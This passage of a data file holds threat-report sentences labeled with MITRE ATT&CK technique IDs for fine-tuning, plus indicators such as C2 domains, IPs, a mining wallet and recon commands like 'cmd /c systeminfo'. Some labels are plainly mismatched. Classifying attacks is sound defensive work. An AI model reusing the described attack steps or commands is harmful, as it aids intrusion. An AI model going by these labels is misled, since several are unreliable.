fine_tune |
| 88 | Various scans and queries are used to find proxy settings, domain controllers, remote desktop services, Citrix services, and network shares. Otherwise, a jump host or other system likely used by domain admins is found and equipped with a Cobalt Strike beacon | ['T1012 - Query Registry'] | fine_tune |
| 89 | This attack begins with a spear phishing attack through a targeted email campaign. Over 80 files were sent to 40 email accounts within the organization, within the span of about an hour. The email contains Microsoft Excel attachments with malicious macros | ['T1566.001 - Phishing: Spearphishing Attachment'] | fine_tune |
| 90 | The original Microsoft Excel spreadsheet is copied into the %TEMP% directory - The embedded object “xl\embeddings\oleObject1[.]bin” inside the Microsoft Excel spreadsheet is copied into the %TEMP% directory - The DLL inside oleObject1.bin is extracted and copied into %APPDATA% by the “ReadAndWriteExtractedBinFile” function - The DLL is loaded with LoadLibraryA - The DLL’s exported function, such as “Get2”, is run by the macro | ['T1055.001 - Process Injection: Dynamic-link Library Injection'] | fine_tune |
| 91 | Please note that the Ecipekac Layer III loader module is embedded in the encrypted Layer II loader | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 92 | This feature generates a stageless Beacon payload artifact, hosts it on Cobalt Strike’s web server, and presents a one-liner to download and run the artifact | ['T1197 - BITS Jobs'] | fine_tune |
| 93 | The NetWire payloads in all observed campaigns included nearly identical configurations. Specifically, the C2 domain clients[.]enigmasolutions[.]xyz and the password were the same | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 94 | Upon exploitation, a GH0ST RAT variant is delivered to the victims’ system, which calls out to a previously known APT18 CnC address 223.25.233.248. GH0ST RAT is a backdoor derived from public source code | ['T1070.001 - Indicator Removal on Host: Clear Windows Event Logs', 'T1059 - Command and Scripting Interpreter'] | fine_tune |
| 95 | If the attack progresses, the user will be taken to the download of an MS Word document containing malicious macros that has very low detection rate at the moment of this campaign delivery. From a metadata standpoint, the document does not include any specific signal or characteristic that would help us tracking documents from the same author, as shown in Figure 6 | ['T1566.001 - Phishing: Spearphishing Attachment', 'T1059.005 - Command and Scripting Interpreter: Visual Basic'] | fine_tune |
| 96 | Each Casbaneiro sample using this method has the buyer’s ID hardcoded in its data. When it downloads such configuration file, it parses it and finds the line that is intended for the specific buyer’s ID and downloads and executes the payload | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1105 - Ingress Tool Transfer'] | fine_tune |
| 97 | However, while the malware used in these new attacks uses similar infection mechanisms to PlugX, it is a completely new tool with its own specific behavior patterns and architecture. We have named this tool “BBSRAT. Targeting and Infrastructure . As described in earlier reports on “Roaming Tiger”, the attack observed in August 2015 used weaponized exploit documents that leave Russian language decoy document files after infecting the system. Figure 2 confirms that the decoy document that opens after the malware infects the system is indeed a list of international exhibitions that were conducted on Russian territory in 2015. Analysis of the command and control (C2) infrastructure shows that the newly discovered samples of BBSRAT used the same C2 domains as previously published in the “Roaming Tiger” campaign, including transactiona[.]com and futuresgold[.]com. This may indicate that for the newer attack campaign using BBSRAT, the adversary may have deployed purpose-built variants and/or infrastructure for each of the intended targets. As we can see, the second command is specifically crafted to run on 64-bit versions of Microsoft Windows. Every subsequent request made by BBSRAT increments this counter by one. The following commands and sub-commands have been identified: Please refer to the appendix for a full list of identified BBSRAT samples and their associated C2 servers. Despite the fact that the information about these attackers has been public for over a year, including a listing of many of the command and control servers, they continue to reuse much of their exposed playbook | ['T1546.015 - Event Triggered Execution: Component Object Model Hijacking'] | fine_tune |
| 98 | This DLL has no other noticeable characteristics, as it functions like a typical malicious sideload. After loading the encrypted payload in memory, it transfers the execution to a shellcode that is located at the beginning of the file. Once loaded in memory, the ZeroT shellcode does not present any kind of obfuscation, unlike that for PlugX. This shellcode is charged with unpacking the encrypted and compressed payload. As in the new PlugX dropper detailed below, this is done using RC4 and RtlDecompressBuffer. As in PlugX samples, the PE header of ZeroT has been tampered with, specifically the “MZ” and “PE” constants (Fig | ['T1573.001 - Symmetric Cryptography'] | fine_tune |
| 99 | All trusted domains, domains, and domain controllers - A list of computers and network devices on the network - The infected machine user and groups the user belongs to - The infected machine, including machine name, operating system, workstation domain, and more information - Network adapters that have connected to the machine and DNS servers | ['T1069 - Permission Groups Discovery', 'T1033 - System Owner/User Discovery', 'T1016 - System Network Configuration Discovery'] | fine_tune |
| 100 | So this method uses psexec itself to copy the payload over the network, overwrite earlier versions (if found), and run it without waiting for any response | ['T1570 - Lateral Tool Transfer'] | fine_tune |
| 101 | Sleeps the downloader. After that, it downloads a file from Discord. The downloaded file is in reverse byte order. Downloads file from Discord. The downloader restores the downloaded file by reversing the bytes within the file. Method that reverses the downloaded file. The restored file is a DLL and serves as the third stage of the infection chain. Retrieving third-stage public methods using Type.GetMethods | ['T1105 - Ingress Tool Transfer', 'T1027 - Obfuscated Files or Information'] | fine_tune |
| 102 | The link “Check” led to a Google Docs page, which contained a link that redirected to a ZIP file. The ZIP file was hosted on a likely compromised SharePoint account and contained Domenus VBS, which downloads Harpy from https[:]//fashionableeder[.]com/info. At one victim, CARBON SPIDER subsequently deployed the aforementioned custom PS Sekur stager and profiled the Active Directory environment using the utility ADFind | ['T1204.001 - Malicious Link'] | fine_tune |
| 103 | 1) Cannon gathers system information and saves it to a file named ini. The Trojan sends an email to sahro.bella7[at]post.cz with i.ini as the attachment, S_inf within the body and a subject with a unique system identifier via SMTPS from one of the following accounts: Bishtr.cam47 Lobrek.chizh Cervot.woprov 2) Bishtr.cam47 3) Lobrek.chizh 4) Cervot.woprov | ['T1082 - System Information Discovery'] | fine_tune |
| 104 | Additionally, the website utilizes an AI-based application that runs in the background and optimizes its accessibility level constantly. This application remediates the website’s HTML, adapts its functionality and behavior for screen-readers used by blind users, and for keyboard functions used by individuals with motor impairments | ['T1095 - Non-Application Layer Protocol'] | fine_tune |
| 105 | ESTSecurity inspected a malicious lure document discussing North Korean defectors. This lure document contained a UPX packed binary that reached out to wave[.]posadadesantiago[.]com. Based upon their report we believe SHA256: 252d1b7a379f97fddd691880c1cf93eaeb2a5e5572e92a25240b75953c88736c, either is or is strikingly similar to the document discussed in their blog post based on these similarities | ['T1566.001 - Phishing: Spearphishing Attachment'] | fine_tune |
| 106 | The xmrig mining process joins the supportxmr mining pool using the wallet address 428uyvSqdpVZL7HHgpj2T5SpasCcoHZNTTzE3Lz2H5ZkiMzqayy19sYDcBGDCjoWbTfLBnc3tc9rG4Y8gXQ8fJiP5tqeBda. At the time of writing, the malware campaign has ~25.05 KH/s hashing power and there is 11 XMR (~$1,500) in the wallet | ['T1496 - Resource Hijacking'] | fine_tune |
| 107 | The primary goal of the Dark Halo threat actor was to obtain the e-mails of specific individuals at the think tank. This included a handful of select executives, policy experts, and the IT staff at the organization. Volexity notes its investigations are directly related to the FireEye report based on overlap between command-and-control (C2) domains and other related indicators such as a backdoored server running SolarWinds Orion | ['T1114.002 - Email Collection: Remote Email Collection'] | fine_tune |
| 108 | Finally, it creates and runs a shell script at /tmp/.server.sh, which also establishes a reverse shell | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1059.004 - Command and Scripting Interpreter: Bash'] | fine_tune |
| 109 | As with campaigns attributed to BlackEnergy group the attackers used spearphishing emails with Microsoft Excel documents attached that contain malicious macros as an initial infection vector. This time malicious documents don’t have any content with social engineering directing potential victims to click an Enable Content button | ['T1566.001 - Phishing: Spearphishing Attachment'] | fine_tune |
| 110 | 1) The infection chain used in this attack begins with a weaponized link to a Google Drive folder, obfuscated using the goo.gl link shortening service. 2) When contacted, the Google Drive link retrieves a zip file, which contains a .lnk file obfuscated as a .pdf file using the double extension trick. MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs. 4) The .lnk file uses an embedded VBScript component to retrieve a decoy PDF file and a PowerShell script from the adversary-controlled web page. 5) The PowerShell script creates a Cobalt Strike stager payload. This PowerShell script also retrieves an XOR-encoded Cobalt Strike beacon payload from an adversary-controlled domain. 6) The Cobalt Strike Beacon implant beacons to the command-and-control (C2) IP address, which is used to remotely control the implant | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 111 | When executing the code, the browser creates an invisible image tag and sets the URL to an attack server using the file:// protocol scheme. On Windows machines, this triggers a request to a remote server via the Samba networking protocol (SMB) that also transmits the user’s login NTLM hash. These hashes can be cracked to retrieve the original login password by methods of brute-force, dictionary, or rainbow table lookups | ['T1003.004 - OS Credential Dumping: LSA Secrets', 'T1552.001 - Unsecured Credentials: Credentials In Files', 'T1555.003 - Credentials from Password Stores: Credentials from Web Browsers', 'T1003.005 - OS Credential Dumping: Cached Domain Credentials', 'T1555 - Credentials from Password Stores', 'T1003.001 - OS Credential Dumping: LSASS Memory'] | fine_tune |
| 112 | The ProgramArguments tell us where GrowlHelper is installed and that it takes at least one command line argument (-f). The RunAtLoad key confirms the implant will run every time the user logs in. To get an overview of the installation process, we can monitor file system activity for GrowlHelper events | ['T1546.004 - Event Triggered Execution: .bash_profile .bashrc and .shrc'] | fine_tune |
| 113 | TrickBot has arguably been one of the most popular Trojans for the past couple of years, used by threat actors mostly because of its modular design and highly resilient infrastructure. Bitdefender researchers even analyzed one of its modules earlier this year, particularly because it targeted telecom, education, and financial services in the US and Hong Kong | ['T1090.002 - External Proxy'] | fine_tune |
| 114 | When executed, BoomBox ensures that a directory named NV is present in its current working directory; otherwise it terminates. If the directory is present, BoomBox displays the contents of the NV directory in a new Windows Explorer window (leaving it up to the user to open the PDF file | ['T1480 - Execution Guardrails', 'T1083 - File and Directory Discovery', 'T1480 - Execution Guardrails', 'T1480 - Execution Guardrails'] | fine_tune |
| 115 | Like many other phishing attacks, in this phishing campaign, Charming Kitten uses a fake SMS (Figure 1) to trick their victims. They send confirmation messages stating ‘Google Account Recovery’ to their targets; they claim these messages are sent by Google and the user must follow the link in the SMS to confirm the identity | ['T1598.003 - Spearphishing Link'] | fine_tune |
| 116 | Viewing results Commands scheduled with at run as background processes. Output is not displayed on the computer screen. To redirect output to a file, use the redirection symbol (>). If you redirect output to a file, you need to use the escape symbol (^) before the redirection symbol, whether you are using at at the command line or in a batch file. For example, to redirect output to Output.text, type: at 14:45 c:\test.bat ^>c:\output.txt The current directory for the executing command is the systemroot folder. Changing system time If you change the system time at a computer after you schedule a command to run with at, synchronize the at scheduler with the revised system time by typing at without command-line options. Storing commands Scheduled commands are stored in the registry. As a result, you do not lose scheduled tasks if you restart the Schedule service. Connecting to network drives Do not use a redirected drive for scheduled jobs that access the network. The Schedule service might not be able to access the redirected drive, or the redirected drive might not be present if a different user is logged on at the time the scheduled task runs. Instead, use UNC paths for scheduled jobs | ['T1053.002 - Scheduled Task/Job: At'] | fine_tune |
| 117 | BUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy | ['T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 118 | BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress. For full, comprehensive documentation of the tool and all of its commands, see bitsadmin and bitsadmin examples in the Windows IT Pro Center | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 119 | Once the malware starts it tries to reach a hardcoded C2. The communication takes place using the unmodified HTTP-based protocol, the request and response body are RC4-encrypted, and the encryption key is also hardcoded into the sample. As the result of the RC4 encryption may contain binary data, the malware additionally encodes it in BASE64, to match the HTTP specification | ['T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 120 | TG-3390 uses DLL side loading, a technique that involves running a legitimate, typically digitally signed, program that loads a malicious DLL. The DLL acts as a stub loader, which loads and executes the shell code. The adversaries have used this technique to allow PlugX and HttpBrowser to persist on a system | ['T1574.002 - Hijack Execution Flow: DLL Side-Loading'] | fine_tune |
| 121 | 1) User must open the Microsoft Word email attachment 2) User must scroll to page three of the document, which will run the DealersChoice Flash object 3) The Flash object must contact an active C2 server to download an additional Flash object containing exploit code 4) The initial Flash object must contact the same C2 server to download a secondary payload 5) Victim host must have a vulnerable version of Flash installed | ['T1203 - Exploitation for Client Execution'] | fine_tune |
| 122 | This agent also built in a function aptly named “DeleteLeftovers,” to remove certain artifacts of the attack | ['T1070 - Indicator Removal on Host'] | fine_tune |
| 123 | In addition to the aforementioned DOCX file, we found another related DDE enabled document based on an infrastructure overlap with a Zebrocy C2 IP address. This related delivery document was an RTF file that downloaded and installed a payload used to load the open-source Koadic tool. We do not have telemetry on the target or attack vector, but we know the RTF file used DDE to download and execute an executable that loaded Koadic. We believe the actor used a cryptor on the payload, as it obtains a filename and script from within its resources and decodes these resources by multiplying each byte by negative one. The payload then uses the MD5 hash (14331d289e737093994395d3fc412afc) of what appears to be a hardcoded SHA1 hash (B6A75B1EF701710D7AEADE0FE93DE8477F3BD506) as an RC4 key to decrypts the resulting decoded data. The embedded VBScript is retrieved from a resource and decrypted using the same algorithm as discussed above, which results in the following cleartext | ['T1140 - Deobfuscate/Decode Files or Information'] | fine_tune |
| 124 | Impersonation using Kerberos pass-the-ticket attacks (Mimikatz PowerShell) - Email extraction from the MS Exchange Server using compromised credentials - Archiving sensitive information - Data exfiltration via legitimate cloud services - Secure file deletion | ['T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1550.003 - Use Alternate Authentication Material: Pass the Ticket', 'T1114.002 - Email Collection: Remote Email Collection', 'T1078 - Valid Accounts'] | fine_tune |
| 125 | Computer name - System info using: cmd /c systeminfo >%temp%\temp.ini - List of currently running process using: cmd /c tasklist >%temp%\temp.ini | ['T1082 - System Information Discovery'] | fine_tune |
| 126 | Different drivers will be loaded based on the system version. The malware uses IsWow64Process to determine which driver version to load. These drivers are stored in the resource section of the binary and are compressed with the Lempel-Ziv algorithm. The driver file is written to system32\drivers with a 4-character, pseudo-randomly generated name. This file is then decompressed using LZCopy to a new file with a “.sys” extension | ['T1027 - Obfuscated Files or Information', 'T1140 - Deobfuscate/Decode Files or Information'] | fine_tune |
| 127 | The main purpose of P8RAT is downloading and executing payloads (consisting of PE and shellcode) from its C2 server | ['T1001.001 - Junk Data'] | fine_tune |
| 128 | Throughout 2017 and 2018 Unit 42 has been tracking and observing a series of highly targeted attacks focused in South East Asia, building on our research into the KHRAT Trojan. Based on the evidence, these attacks appear to be conducted by the same set of attackers using previously unknown malware families. In addition, these attacks appear to be highly targeted in their distribution of the malware used, as well as the targets chosen. We believe this group is previously unidentified and therefore have we have dubbed it “RANCOR”. The Rancor group’s attacks use two primary malware families which we describe in depth later in this blog and are naming DDKONG and PLAINTEE. DDKONG is used throughout the campaign and PLAINTEE appears to be new addition to these attackers’ toolkit. Countries Unit 42 has identified as targeted by Rancor with these malware families include, but are not limited to | ['T1059.005 - Command and Scripting Interpreter: Visual Basic', 'T1105 - Ingress Tool Transfer'] | fine_tune |
| 129 | To avoid detection, the macros employ simple obfuscation of interesting strings that ultimately just used base64 encoding. However, it used a somewhat unusual method where it would first convert the base64-encoded text into hex, and then convert that hex into a text string | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 130 | Some additional log file analysis reveals that a dotm file hosted with a. jpg extension was accessed by an Israeli IP address. This IP address likely belongs to a victim in Israel that executed the main DOCX. Based on the analysis of the user-agent string belonging to the Israel IP address Microsoft+Office+Existence+Discovery indicates that the dotm file in question was downloaded from within Microsoft Office (template injection | ['T1480 - Execution Guardrails'] | fine_tune |
| 131 | 1) It uses the application programming interface (API) CreateFileA to \\.\PHYSICALDRIVE0 to retrieve the handle of the hard disk. 2) It overwrites the first sector of the disk (512 bytes) with "0x00". The first sector is the disk’s MBR. 3) It will try to perform the routines above (steps 1-2) on \\.\PHYSICALDRIVE1, \\.\PHYSICALDRIVE2, \\.\PHYSICALDRIVE3, and so on, as long as a hard disk is available | ['T1082 - System Information Discovery'] | fine_tune |
| 132 | Upon further inspection, Kroll learned that an employee using their work computer had clicked on a malicious link from their personal email account that downloaded a Qakbot dropper | ['T1059.005 - Command and Scripting Interpreter: Visual Basic'] | fine_tune |
| 133 | This activity has TTP and targeting overlap with previous activity, suspected to be APT29. The 2018 and 2016 LNK files are similar in structure and code, and contain significant metadata overlap, including the MAC address of the system on which the LNK was created | ['T1204.001 - Malicious Link', 'T1566.001 - Phishing: Spearphishing Attachment'] | fine_tune |
| 134 | APT19 used three different techniques to attempt to compromise targets. Toward the end of May, APT19 switched to using macro-enabled Microsoft Excel (XLSM) documents. In the most recent versions, APT19 added an application whitelisting bypass to the XLSM documents | ['T1218.010 - Signed Binary Proxy Execution: Regsvr32'] | fine_tune |
| 135 | WastedLocker aims to encrypt the files of the infected host. However before the encryption procedure runs, WastedLocker performs a few other tasks to ensure the ransomware will run properly | ['T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking'] | fine_tune |
| 136 | Attempted to blend in with a file name that matched the system name it resided on - Configured for WMI persistence (generally uncommon in 2019) - Used likely compromised infrastructure for C2 - Masquerades its command-and-control (C2) traffic as legitimate Google Notifications HTTP requests | ['T1071.001 - Application Layer Protocol: Web Protocols', 'T1001 - Data Obfuscation'] | fine_tune |
| 137 | In most systems compromised by Kobalos, the SSH client is compromised to steal credentials. This credential stealer is unlike any of the malicious OpenSSH clients we’ve seen before, and we’ve looked at tens of them in the past eight years. The sophistication of this component is not the same as Kobalos itself: there was no effort to obfuscate early variants of the credential stealer. However, we found newer variants that contain some obfuscation and the ability to exfiltrate credentials over the network | ['T1048 - Exfiltration Over Alternative Protocol'] | fine_tune |
| 138 | The C2 server can also send a PowerShell command to capture and store a screenshot of a victim’s system. POWRUNER will send the captured screenshot image file to the C2 server if the “fileupload” command is issued. Figure 6 shows the PowerShell “Get-Screenshot” function sent by the C2 server | ['T1113 - Screen Capture'] | fine_tune |
| 139 | At installation, the MSI file drops three files and creates one hidden directory (UFile) into C:\ProgramData\Apple\Update\, likely as a ruse | ['T1564.001 - Hide Artifacts: Hidden Files and Directories', 'T1564.001 - Hide Artifacts: Hidden Files and Directories'] | fine_tune |
| 140 | On execution, the MSI downloader starts by checking if it is running in a virtual machine. If not, downloads a zip file, unzips it, deletes itself, establishes persistency and restarts the system | ['T1140 - Deobfuscate/Decode Files or Information', 'T1102.003 - One-Way Communication'] | fine_tune |
| 141 | ServHelper’s payload, an NSIS Installer signed with a valid digital signature (further details on the certificate ahead), is downloaded by msiexec.exe to its temporary folder (C:\Windows\Installer\MSI[4-charachter-string].tmp) and executed | ['T1218.007 - Signed Binary Proxy Execution: Msiexec'] | fine_tune |
| 142 | secretsdump.py: Performs various techniques to dump secrets from the remote machine without executing any agent there. For DIT files, we dump NTLM hashes, Plaintext credentials (if available) and Kerberos keys using the DL_DRSGetNCChanges() method. It can also dump NTDS.dit via vssadmin executed with the smbexec/wmiexec approach. mimikatz.py: Mini shell to control a remote mimikatz RPC server developed by @gentilkiwi | ['T1003.004 - OS Credential Dumping: LSA Secrets', 'T1003.002 - OS Credential Dumping: Security Account Manager', 'T1003.003 - OS Credential Dumping: NTDS', 'T1003.001 - OS Credential Dumping: LSASS Memory'] | fine_tune |
| 143 | To recap, on September 18, 2017, we disclosed that CCleaner had been targeted by cybercriminals, in order to distribute malware via the CCleaner installation file. The altered installation file was downloaded by 2.27 million CCleaner customers worldwide. The malware was introduced to the build server of Piriform, the company developing CCleaner, some time between March 11 and July 4, 2017, prior to Avast’s acquisition of Piriform on July 18, 2017 | ['T1195.002 - Compromise Software Supply Chain'] | fine_tune |
| 144 | These credentials are used in a credential stuffing or password spraying attack against the victim’s remote services, such as webmail or other internet reachable mail services. After obtaining a valid account, they use this account to access the victim’s VPN, Citrix or another remote service that allows access to the network of the victim. Information regarding these remotes services is taken from the mailbox, cloud drive, or other cloud resources accessible by the compromised account. As soon as they have a foothold on a system (also known as patient zero or index case), they check the permissions of the account on that system, and attempt to obtain a list of accounts with administrator privileges. With this list of administrator-accounts, the adversary performs another password spraying attack until a valid admin account is compromised. From here on the adversary stops using the victim’s remote service to access the victim’s network, and starts using the Cobalt Strike beacon for remote access and command and control | ['T1082 - System Information Discovery'] | fine_tune |
| 145 | This dynamic link library appears to be a legitimate version of libcurl.dll except for a single exported function, which is referred to as ordinal #52 and curl_share_init in the analyzed sample. This function has been modified by threat actors to extract a resource contained within libcurl.dll, decrypt malicious data included in that resource, and load the resulting DLL to execute a malicious function. When this function is executed, the SodomNormal communications module begins running within Libcurl.dll | ['T1140 - Deobfuscate/Decode Files or Information'] | fine_tune |
| 146 | Wscript.exe does a number of things: It deletes the original QakBot.vbs and writes four files to disk in %APPDATA% induce.flac, pep.csv, rhythm.tex and senate.m4a. Senate.m4a is deleted after full process execution | ['T1070.004 - Indicator Removal on Host: File Deletion'] | fine_tune |
| 147 | These privilege escalation modules are the ones we caught when we queried for Jian’s global configuration table. We also found a couple of more Local Privilege Escalation exploits from the NtElevation series | ['T1068 - Exploitation for Privilege Escalation'] | fine_tune |
| 148 | First, several of these commands contain checks to determine the environment in order to use appropriate paths or commands. The ‘tasklist’ command will use a WMI query or the “ps” command, which allows Kazuar to obtain running processes from both Windows and Unix systems. Also, Kazuar’s ‘cmd’ command will run commands using “cmd.exe” for Windows systems and “/bin/bash” for Unix systems. These two commands provide evidence that the authors of Kazuar intended to use this malware as a cross-platform tool to target both Windows and Unix systems | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell'] | fine_tune |
| 149 | All the commands received from the C2 are first saved to an auxiliary file and then stored encrypted in the system registry. The standalone thread will decrypt and execute them | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1047 - Windows Management Instrumentation'] | fine_tune |
| 150 | sifo – Collect victim system information - drive – List drives on victim machine - list – List file information for provided directory - upload – Upload a file to the victim machine - open – Spawn a command shell | ['T1082 - System Information Discovery', 'T1083 - File and Directory Discovery', 'T1105 - Ingress Tool Transfer', 'T1082 - System Information Discovery', 'T1083 - File and Directory Discovery'] | fine_tune |
| 151 | The buffer containing the ZxShell Dll in the new location is freed using the VirtualFree API function. A handle to the DLL file is taken in order to make its deletion more difficult. The ZxShell mutex is created named @_ZXSHELL_ | ['T1218.011 - Signed Binary Proxy Execution: Rundll32'] | fine_tune |
| 152 | Use of Open Source Tools In an attempt to avoid detection and as an anti-analysis tactic, the OilRig group abused an open source tool called Invoke-Obfuscation to obfuscate the code used for QUADAGENT. Invoke-Obfuscation is freely available via a Github repository and allows a user to change the visual representation of a PowerShell script simply by selecting the desired obfuscation techniques. Invoke-Obfuscation offers a variety of obfuscation techniques, and by analyzing the script we were able to ascertain the specific options in this attack. After identifying the specific options used to obfuscate QUADAGENT, we were able to deobfuscate the PowerShell script and perform additional analysis. We found two obfuscation techniques applied to the script: the first one changing the representation of variables; the second one changing the representation of strings in the script. Invoke-Obfuscation calls the string obfuscation used by the actors to further obfuscate this script Reorder, which uses the string formatting functionality within PowerShell to reconstruct strings from out of order substrings (ex. 1}{0}" -f 'bar','foo'). During our analysis, we installed Invoke-Obfuscation and used it to obfuscate a previously collected QUADAGENT sample to confirm our analysis | ['T1059.001 - Command and Scripting Interpreter: PowerShell'] | fine_tune |
| 153 | Further into the infection process, the malware chooses a service name randomly from netsvc in order to use it for the payload creation path. The malware then creates a file named bcdbootinfo.tlp in the system folder containing the infection time and the random service name that is chosen. We’ve discovered that the malware operator checks this file to see whether the remote host was infected and, if so, when the infection happened | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | fine_tune |
| 154 | Between August 2 and 4, the actor sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors | ['T1204.001 - Malicious Link'] | fine_tune |
| 155 | The module gathers information about the user and attempts to verify whether this is a local admin or a domain admin. This shows that after infecting the machine, Valak chooses to target mainly administrators and domain admins. This indicates a propensity to target higher profile accounts such as enterprise admins | ['T1087.001 - Account Discovery: Local Account', 'T1087.002 - Account Discovery: Domain Account'] | fine_tune |
| 156 | The initial routine decrypts selected parts of the code section using XOR with a hardcoded value | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 157 | A second method consists to use the CredEnumerateW Windows API. Finally, Perfc.dat contains three embedded executables in its resource section which are compressed with zlib. Two of the executables are used to recover user credentials (32 and 64 bits) while the third one is the PsExec binary | ['T1021.002 - Remote Services: SMB/Windows Admin Shares'] | fine_tune |
| 158 | It can download and execute arbitrary code provided from the C&C server, as well as maintain a virtual file system (VFS) inside the registry. The VFS, and any additional files created by the code, are encrypted and stored in a location unique to each victim | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 159 | In June 2015, a number of web portal email accounts were hacked, sending emails with malicious Hangul document files and phishing emails to steal portal account credentials. In January 2016, a large number of emails with malicious attachments were sent under the guise of ‘Office of National Security at the Blue House’ to government research institutes. Analysis by related organizations identified the malicious attachment as Kimsuky malware [3 | ['T1586.002 - Email Accounts'] | fine_tune |
| 160 | Both malicious programs share the code for LZMA compression algorithm. In CloudAtlas it is used to compress the logs and to decompress the decrypted payload from the C&C servers, while in Red October the “scheduler” plugin uses it to decompress executable payloads from the C&C | ['T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1059.005 - Command and Scripting Interpreter: Visual Basic'] | fine_tune |
| 161 | X-Session: 0"). Its presence on a compromised system allows a threat actor to execute a wide variety of commands, including uploading and downloading files, and spawning a reverse shell. The malware can be configured to use multiple network protocols to avoid network-based detection. DLL side loading is often used to maintain persistence on the compromised system. Antivirus detection for HttpBrowser is extremely low and is typically based upon heuristic signatures. DLL side loading has been used to maintain persistence on the compromised system. More information about HttpBrowser is available in Appendix B. HttpBrowser URI. Source: Dell SecureWorks) - ChinaChopper web shell — A web-based executable script (see Figure 4) that allows a threat actor to execute commands on the compromised system. TG-3390 has used additional web shells containing similarly formatted passwords | ['T1071.004 - Application Layer Protocol: DNS'] | fine_tune |
| 162 | Similar to RIPTIDE campaigns, APT12 infects target systems with HIGHTIDE using a Microsoft Word (.doc) document that exploits CVE-2012-0158. FireEye observed APT12 deliver these exploit documents via phishing emails in multiple cases. Based on past APT12 activity, we expect the threat group to continue to utilize phishing as a malware delivery method | ['T1203 - Exploitation for Client Execution'] | fine_tune |
| 163 | The screenshot in Figure 8 of the inf method within a Cannon sample (SHA256: 4405cfbf28. ) shows the information gathered that is exfiltrated to the C2 via email, specifically with RunningPlace and LogicalDrives header strings | ['T1082 - System Information Discovery'] | fine_tune |
| 164 | The second generation (2.x) was used to conduct an attack which we investigated during its active stage. We successfully prevented data transfer to the cybercriminals’ server and isolated the infected systems in the company’s local network. The incidents, as well as results of our investigation, are described in the full report on the Winnti group (PDF | ['T1014 - Rootkit'] | fine_tune |
| 165 | Conficker will copy itself with a random name into the system directory %systemroot%\system32 and register itself as a service. The remote computer will then download the worm from the URL given and then start to infect other machines as well. Upon successful infection, it will also patch the hole to prevent other worms to infect the machine" (Racicot | ['T1046 - Network Service Discovery', 'T1112 - Modify Registry'] | fine_tune |
| 166 | On October 28, we observed APT3 sending out spearphishing messages containing a compressed executable attachment. The deflated exe was a variant of the same downloader described above and connected to 198.55.115.71 over port 1913 via SOCKS5 proxy. The secondary payload in that case was detected as Backdoor.APT.CookieCutter (aka Pirpi) and also named newnotepad.exe (MD5 8849538ef1c3471640230605c2623c67) and connected to the known APT3 domains | ['T1090.002 - External Proxy', 'T1095 - Non-Application Layer Protocol'] | fine_tune |
| 167 | You are using Microsoft Internet Explorer. We recommend using Chrome or Firefox for the best experience | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell'] | fine_tune |
| 168 | In addition, PLAINTEE will create a unique GUID via a call to CoCreateGuid() to be used as an identifier for the victim. The malware then proceeds to collect general system enumeration data about the infected machine and enters a loop where it will decode an embedded config blob and send an initial beacon to the C2 server. The configuration blob is encoded using a simple single-byte XOR scheme. The first byte of the string is used as the XOR key to in turn decode the remainder of the data | ['T1573.001 - Symmetric Cryptography'] | fine_tune |
| 169 | We named Lazarus the most active group of 2020. We’ve observed numerous activities by this notorious APT group targeting various industries. The group has changed target depending on the primary objective. Google TAG has recently published a post about a campaign by Lazarus targeting security researchers. We have seen Lazarus attack various industries using this malware cluster before. In mid-2020, we realized that Lazarus was launching attacks on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of Manuscrypt (a.k.a. NukeSped). While investigating this activity, we were able to observe the complete life cycle of an attack, uncovering more technical details and links to the group’s other campaigns | ['T1005 - Data from Local System', 'T1566.002 - Phishing: Spearphishing Link', 'T1204.002 - User Execution: Malicious File'] | fine_tune |
| 170 | Once the initial computer on the targeted organization’s network is infected with Vcrodat, Whitefly begins mapping the network and infecting further computers. The attackers rely heavily on tools such as Mimikatz to obtain credentials. Using these credentials, the attackers are able to compromise more machines on the network and, from those machines, again obtain more credentials | ['T1588.002 - Tool', 'T1068 - Exploitation for Privilege Escalation'] | fine_tune |
| 171 | The diagram below illustrates the methodology used by the actor to communicate with the FoggyWeb backdoor located on a compromised internet-facing AD FS server | ['T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 172 | id — the generated unique identifier of the infected host - message — the Base64-encoded output from the newly created cmd.exe console process | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 173 | The archive contains a legitimate older version of Microsoft Word (Microsoft Word 2007) executable file that is named ‘Noi dung chi tiet don khieu nai gui cong ty.exe’ which translates to ‘Learn more about how to use your company’ in English. The attacker used the DLL side loading technique to load a malicious DLL by the older version of Microsoft Word. When opening the executable file in the archive, it loads the malicious DLL in the same directory. The DLL executes multi-stage shellcodes and each shellcode employs various technique to hide the next stage | ['T1574.002 - Hijack Execution Flow: DLL Side-Loading'] | fine_tune |
